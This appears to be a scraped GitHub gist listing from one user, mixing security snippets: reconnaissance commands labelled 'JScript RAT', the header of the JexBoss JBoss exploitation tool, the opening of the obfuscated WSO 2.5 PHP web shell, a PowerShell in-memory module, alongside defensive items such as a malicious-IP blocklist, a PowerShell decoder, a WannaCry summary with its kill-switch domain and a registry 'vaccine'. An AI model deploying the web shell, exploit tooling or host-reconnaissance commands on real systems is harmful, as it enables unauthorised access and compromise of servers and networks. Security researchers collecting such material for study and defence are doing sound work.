@cephurs
cephurs / Commands.txt
Created January 24, 2016 17:51
JScript RAT - The Beginning...
Author: Casey Smith @subTee
ipconfig /all >> C:\Tools\Debug\1.txt
tasklist /v >> C:\Tools\Debug\1.txt
net user >> C:\Tools\Debug\1.txt
net localgroup administrators >> C:\Tools\Debug\1.txt
netstat -ano >> C:\Tools\Debug\1.txt
net use >> C:\Tools\Debug\1.txt
net view >> C:\Tools\Debug\1.txt
net view /domain >> C:\Tools\Debug\1.txt
@cephurs
cephurs / himawari.ps1
Created February 4, 2016 01:03 — forked from MichaelPote/himawari.ps1
Windows PowerShell script to download the latest image from the Himawari-8 satellite, combine the tiles into a single image, convert it to JPG and then set it as the desktop background.
#
# Himawari-8 Downloader
#
#
#
# This script will scrape the latest image from the Himawari-8 satellite, recombining the tiled image,
# converting it to a JPG which is saved in My Pictures\Himawari\ and then set as the desktop background.
#
# http://himawari8.nict.go.jp/himawari8-image.htm
#
@cephurs
cephurs / blacklist.txt
Created February 26, 2016 03:42 — forked from jedisct1/blacklist.txt
2500+ malicious IP addresses
2500+ IP addresses dedicated to serving malware.
@cephurs
cephurs / JexBoss.py
Created May 9, 2016 01:38 — forked from googleinurl/JexBoss.py
JexBoss - Jboss Verify Tool - (MASS) / SCRIPT Edited by: GoogleINURL
#coding: utf-8
'''
--------------------------------------------------------------------------------------
# [+] JexBoss v1.0. @author: João Filho Matos Figueiredo ([email protected])
# [+] Updates: https://github.com/joaomatosf/jexboss
# [+] SCRIPT original: http://1337day.com/exploit/23507
# [+] Free for distribution and modification, but the authorship should be preserved.
--------------------------------------------------------------------------------------
[+] SCRIPT Edited by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ]
@cephurs
cephurs / quick_ioctl_decoder.py
Created August 14, 2016 20:09 — forked from herrcore/quick_ioctl_decoder.py
IDA Python plugin - Decode IOCTL Codes
############################################################################################
##
## Quick IOCTL Decoder!
##
## All credit for actual IOCTL decode logic:
## http://www.osronline.com/article.cfm?article=229
##
##
## To install:
## Copy script into plugins directory, i.e: C:\Program Files\IDA 6.8\plugins
@cephurs
cephurs / psx.py
Created November 24, 2016 11:40 — forked from anonymous/psx.py
PowerShell decoder by @JohnLaTwC
## hacked together by @JohnLaTwC, Nov 2016, v 0.5
## This script attempts to decode common PowerShell encoded scripts. This version handles:
## * base64 data which encode unicode, gzip, or deflate encoded strings
## * it can operate on a file or stdin
## * it can run recursively in the event of multiple layers
## With apologies to @Lee_Holmes for using Python instead of PowerShell
##
import sys
import zlib
import re
@cephurs
cephurs / wso_2.5_shell.php
Created December 15, 2016 04:50 — forked from 1N3/wso_2.5_shell.php
WSO 2.5 Shell
<?php
if (isset ($_GET['lU$6AJp0aXFt0RyAynP9OnL7FlzQ']))
{
$a1="Fil";
$c1="#d";
$c2="f5";
$color = $c1.$c2;
$bs="esM";
$da="an";
$default_action = $a1.$bs.$da;
#Requires -Version 2
function New-InMemoryModule
{
<#
.SYNOPSIS
Creates an in-memory assembly and module
Author: Matthew Graeber (@mattifestation)

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS17-010. It uses the EternalBlue MS17-010 exploit to propagate.
  • Ransom: between $300 and $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. (source: malwarebytes)
  • Infections: NHS (uk), Telefonica (spain), FedEx (us), Russia interior ministry & Megafon (russia)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes)

SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

@cephurs
cephurs / wannacry-vaccine.reg
Created May 12, 2017 22:24 — forked from Neo23x0/wannacry-vaccine.reg
WannaCrypt Ransomware Immunisation
Windows Registry Editor Version 5.00

; Image File Execution Options "Debugger" entries: when Windows starts an executable with this
; image name, it launches the "Debugger" command instead, so the named binary never runs.
; taskkill expects /IM to be followed directly by the image name, so /F is placed first.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskdl.exe]
"Debugger"="taskkill /F /IM taskdl.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskse.exe]
"Debugger"="taskkill /F /IM taskse.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wannacry.exe]
"Debugger"="taskkill.exe /F /IM wannacry.exe"